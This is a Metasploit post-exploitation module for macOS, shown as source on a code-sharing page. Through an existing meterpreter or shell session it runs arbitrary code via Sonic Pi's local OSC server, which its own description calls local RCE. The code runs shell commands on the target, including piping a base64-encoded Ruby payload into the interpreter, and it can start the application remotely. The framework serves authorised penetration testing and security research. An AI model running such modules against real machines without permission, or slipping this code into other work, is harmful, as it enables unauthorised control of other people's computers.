Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/osx/manage/sonic_pi.rb
19813 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7


8
  def initialize(info = {})

9
    super(

10
      update_info(

11
        info,

12
        'Name' => 'OS X Manage Sonic Pi',

13
        'Description' => %q{

14
          This module controls Sonic Pi via its local OSC server.

15


16
          The server runs on 127.0.0.1:4557 and receives OSC messages over UDP.

17


18
          Yes, this is RCE, but it's local. I suggest playing music. :-)

19
        },

20
        'Author' => [

21
          'Sam Aaron', # Sonic Pi

22
          'wvu'        # Module and Sonic Pi example

23
        ],

24
        'References' => [

25
          %w[URL https://sonic-pi.net/],

26
          %w[URL https://github.com/samaaron/sonic-pi/wiki/Sonic-Pi-Internals----GUI-Ruby-API],

27
          %w[URL http://opensoundcontrol.org/spec-1_0]

28
        ],

29
        'License' => MSF_LICENSE,

30
        'Platform' => 'osx',

31
        'SessionTypes' => %w[meterpreter shell],

32
        'Actions' => [

33
          ['Run', { 'Description' => 'Run Sonic Pi code' }],

34
          ['Stop', { 'Description' => 'Stop all jobs' }]

35
        ],

36
        'DefaultAction' => 'Run',

37
        'Notes' => {

38
          'Stability' => [CRASH_SAFE],

39
          'SideEffects' => [AUDIO_EFFECTS, SCREEN_EFFECTS],

40
          'Reliability' => []

41
        }

42
      )

43
    )

44


45
    register_options([

46
      OptAddress.new('OSC_HOST', [true, 'OSC server host', '127.0.0.1']),

47
      OptPort.new('OSC_PORT', [true, 'OSC server port', 4557]),

48
      OptBool.new('START_SONIC_PI', [true, 'Start Sonic Pi', false]),

49
      OptPath.new(

50
        'FILE',

51
        [

52
          true,

53
          'Path to Sonic Pi code',

54
          File.join(Msf::Config.data_directory, 'post', 'sonic_pi_example.rb')

55
        ]

56
      )

57
    ])

58


59
    register_advanced_options([

60
      OptString.new(

61
        'SonicPiPath',

62
        [

63
          true,

64
          'Path to Sonic Pi executable',

65
          '/Applications/Sonic Pi.app/Contents/MacOS/Sonic Pi'

66
        ]

67
      ),

68
      OptString.new(

69
        'RubyPath',

70
        [

71
          true,

72
          'Path to Ruby executable',

73
          '/Applications/Sonic Pi.app/server/native/ruby/bin/ruby'

74
        ]

75
      )

76
    ])

77
  end

78


79
  def osc_host

80
    datastore['OSC_HOST']

81
  end

82


83
  def osc_port

84
    datastore['OSC_PORT']

85
  end

86


87
  def sonic_pi

88
    datastore['SonicPiPath'].shellescape

89
  end

90


91
  def ruby

92
    datastore['RubyPath'].shellescape

93
  end

94


95
  def check_lsof

96
    cmd_exec("lsof -ni :#{osc_port} && echo true").end_with?('true')

97
  end

98


99
  def run

100
    begin

101
      unless check_lsof

102
        print_error('Sonic Pi is not running')

103


104
        return if @tried

105


106
        if datastore['START_SONIC_PI']

107
          print_status('Starting Sonic Pi...')

108


109
          # XXX: shell_command_token uses ; as a command separator

110
          cmd_exec("#{sonic_pi} & :")

111
          sleep(10)

112


113
          @tried = true

114
          raise RuntimeError

115
        end

116


117
        return

118
      end

119
    rescue RuntimeError

120
      retry

121
    end

122


123
    print_good('Sonic Pi is running')

124


125
    case action.name

126
    when 'Run'

127
      print_status("Running Sonic Pi code: #{datastore['FILE']}")

128
    when 'Stop'

129
      print_status('Stopping all jobs')

130
    end

131


132
    cmd = "echo #{Rex::Text.encode_base64(code)} | base64 -D | #{ruby}"

133


134
    vprint_status(cmd)

135
    cmd_exec(cmd)

136
  end

137


138
  def code

139
    <<~EOF

140
      require 'socket'

141
      UDPSocket.new.send("#{msg}", 0, '#{osc_host}', #{osc_port})

142
    EOF

143
  end

144


145
  def msg

146
    Rex::Text.to_hex_ascii(

147
      case action.name

148
      when 'Run'

149
        "/run-code\x00\x00\x00,ss\x00#{agent}#{file}"

150
      when 'Stop'

151
        "/stop-all-jobs\x00\x00,\x00\x00\x00"

152
      end

153
    )

154
  end

155


156
  def agent

157
    # Generate random null-terminated agent string

158
    agent = "#{Faker::App.name}\x00"

159


160
    # Pad string with nulls until its length is a multiple of 32 bits

161
    agent << "\x00" until agent.length % 4 == 0

162


163
    # Return null-terminated and null-padded string

164
    agent

165
  end

166


167
  def file

168
    # Read file as null-terminated string

169
    @file = "#{File.read(datastore['FILE'], mode: 'rb')}\x00"

170


171
    # Pad string with nulls until its length is a multiple of 32 bits

172
    @file << "\x00" until @file.length % 4 == 0

173


174
    # Return null-terminated and null-padded string

175
    @file

176
  end

177


178
end

179


180